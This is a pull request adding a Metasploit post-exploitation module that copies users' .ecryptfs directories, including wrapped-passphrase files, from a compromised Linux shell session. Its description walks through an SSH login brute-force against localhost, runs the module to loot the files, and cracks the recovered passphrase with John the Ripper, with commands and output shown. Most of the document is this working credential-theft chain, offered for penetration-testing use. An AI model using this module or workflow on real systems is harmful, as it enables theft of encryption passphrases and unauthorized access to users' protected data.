### PR TITLE
Add information gathering module for eCryptfs

### DIFF
--- a/modules/post/linux/gather/ecryptfs_creds.rb
+++ b/modules/post/linux/gather/ecryptfs_creds.rb
@@ -1,0 +1,73 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+#   http://metasploit.com/
+##
+
+require 'msf/core'
+require 'rex'
+require 'msf/core/post/common'
+require 'msf/core/post/file'
+require 'msf/core/post/unix'
+
+class Metasploit3 < Msf::Post
+
+	include Msf::Post::File
+	include Msf::Post::Common
+	include Msf::Post::Unix
+
+	def initialize(info={})
+		super( update_info(info,
+			'Name'           => 'Gather eCryptfs metadata',
+			'Description'    => %q{
+          This module will grab the contents of user's .ecrypts directory on
+          the targeted machine. Grabbed "wrapped-passphrase" files can be
+          cracked with JtR to get "mount passphrases".
+			},
+			'License'        => MSF_LICENSE,
+			'Author'         => ['Dhiru Kholia <dhiru[at]openwall.com>'],
+			'Platform'       => ['linux'],
+			'SessionTypes'   => ['shell']
+		))
+	end
+
+	# This module is largely based on ssh_creds, gpg_creds and firefox_creds.rb.
+
+	def run
+		print_status("Finding .ecryptfs directories")
+		paths = enum_user_directories.map {|d| d + "/.ecryptfs"}
+		# Array#select! is only in 1.9
+		paths = paths.select { |d| directory?(d) }
+
+		if paths.nil? or paths.empty?
+			print_error("No users found with a .ecryptfs directory")
+			return
+		end
+
+		download_loot(paths)
+	end
+
+	def download_loot(paths)
+		print_status("Looting #{paths.count} directories")
+		paths.each do |path|
+			path.chomp!
+			sep = "/"
+			files = cmd_exec("ls -1 #{path}").split(/\r\n|\r|\n/)
+
+			files.each do |file|
+				target = "#{path}#{sep}#{file}"
+				if directory?(target)
+					next
+				end
+				print_status("Downloading #{path}#{sep}#{file} -> #{file}")
+				data = read_file(target)
+				file = file.split(sep).last
+				loot_path = store_loot("ecryptfs.#{file}", "text/plain", session, data,
+					nil, "eCryptfs #{file} File")
+				print_good("File stored in: #{loot_path.to_s}")
+			end
+		end
+	end
+
+end

--- a/modules/post/linux/gather/ecryptfs_creds.rb
+++ b/modules/post/linux/gather/ecryptfs_creds.rb
@@ -19,11 +19,11 @@ class Metasploit3 < Msf::Post
 
 	def initialize(info={})
 		super( update_info(info,
-			'Name'           => 'Gather eCryptfs metadata',
+			'Name'           => 'Gather eCryptfs Metadata',
 			'Description'    => %q{
-          This module will grab the contents of user's .ecrypts directory on
-          the targeted machine. Grabbed "wrapped-passphrase" files can be
-          cracked with JtR to get "mount passphrases".
+				This module will grab the contents of user's .ecrypts directory on
+				the targeted machine. Grabbed "wrapped-passphrase" files can be
+				cracked with JtR to get "mount passphrases".
 			},
 			'License'        => MSF_LICENSE,
 			'Author'         => ['Dhiru Kholia <dhiru[at]openwall.com>'],


### PR DESCRIPTION
Hi,

I have implemented an information gathering module for eCryptfs. It has been tested against Linux.
- Setup demo

```
✗ cat my.rc 
use auxiliary/scanner/ssh/ssh_login
set PASSWORD test
set RHOSTS 127.0.0.1
set USERNAME test
set ExitOnSession false
exploit
use post/linux/gather/ecryptfs_creds
set SESSION 1
exploit
```
- Launch demo

```
 ✗ ./msfconsole -r my.rc  
...
[*] 127.0.0.1:22 SSH - [2/2] - Trying: username: 'test' with password: 'test'
[*] Command shell session 1 opened (127.0.0.1:33403 -> 127.0.0.1:22) at 2013-07-28 23:09:45 +0530
[+] 127.0.0.1:22 SSH - [2/2] - Success: 'test':'test' 'uid=1001(test) gid=1001(test) groups=1001(test),984(ecryptfs) ... x86_64 x86_64 x86_64 GNU/Linux '
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
resource (my.rc)> use post/linux/gather/ecryptfs_creds
resource (my.rc)> set SESSION 1
SESSION => 1
resource (my.rc)> exploit
[*] Finding .ecryptfs directories
[*] Looting 1 directories
[*] Downloading /home/test/.ecryptfs/auto-mount -> auto-mount
[+] File stored in: /home/attacker/.msf4/loot/20130728231014_default_127.0.0.1_ecryptfs.automo_408499.txt
...
[*] Downloading /home/test/.ecryptfs/wrapped-passphrase -> wrapped-passphrase
[+] File stored in: /home/attacker/.msf4/loot/20130728231018_default_127.0.0.1_ecryptfs.wrapped_322873.txt
[*] Post module execution completed
```
- Build JtR-jumbo (bleeding-jumbo branch) (https://github.com/magnumripper/JohnTheRipper/tree/bleeding-jumbo)

```

$ git clone https://github.com/magnumripper/JohnTheRipper.git -b bleeding-jumbo 

$ cd JohnTheRipper/src

$ make linux-x86-64-native -j 4

```
- Crack "hashes" with JtR-jumbo 

```
$ ../run/ecryptfs2john.py (...)ecryptfs.wrapped_322873.txt > hash

$ cat hash
(...)ecryptfs.wrapped_322873.txt:$ecryptfs$0$92dc3db8feaf1676

$ cat dict
openwall

$ ../run/john hash -w=dict
Loaded 1 password hash (eCryptfs [65536x SHA-512])
...
openwall         (...ecryptfs.wrapped_322873.txt)
```

We were able to recover the password "openwall".
